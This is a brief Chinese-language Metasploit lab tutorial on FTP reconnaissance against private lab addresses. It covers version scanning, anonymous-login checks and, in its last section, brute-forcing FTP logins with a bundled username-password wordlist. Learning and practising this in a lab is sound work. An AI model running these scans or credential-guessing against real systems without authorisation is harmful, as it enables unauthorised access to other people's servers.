基于FTP协议收集信息
1.查看ftp服务的版本信息
打开metasploit
查看ftp版本的模块,并进入模块
msf6 > search ftp_version
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > show options
查看靶机的端口开方情况,21端口开放才能被发现
nmap -p 1-50 192.168.67.130
可以查看到版本信息
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.67.130
msf6 auxiliary(scanner/ftp/ftp_version) > run
2.ftp匿名登录扫描
msf6 > use auxiliary/scanner/ftp/
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) > show optionsmsf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.44.128
msf6 auxiliary(scanner/ftp/anonymous) > run
根据结果说明可以匿名访问不过是只读的方式
3.ftp暴力破解
msf6 > search ftp_login
msf6 > use auxiliary/scanner/ftp/ftp_login
msf6 auxiliary(scanner/ftp/ftp_login) > show optionsmsf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.44.128
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > run